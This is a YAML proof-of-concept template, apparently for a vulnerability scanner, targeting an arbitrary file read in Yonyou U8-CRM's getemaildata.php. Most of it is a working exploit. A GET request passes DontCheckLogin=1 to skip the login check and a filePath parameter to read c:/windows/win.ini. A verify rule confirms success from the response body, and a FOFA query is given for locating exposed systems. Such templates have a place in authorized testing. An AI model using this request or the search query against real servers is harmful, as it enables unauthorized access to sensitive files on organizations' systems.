product: 用友U8-CRM
vName: 用友U8-CRM 客户关系管理系统 getemaildata.php 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友U8-CRM CRM客户管理系统getemaildata.php存在任意文件读取漏洞，攻击者通过漏洞可以获取到服务器中的敏感文件。
version: ''
note: ''
search:
  FOFA: app="用友U8CRM"
protocol: http
link: https://www.cnblogs.com/kalixcn/p/18081481
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and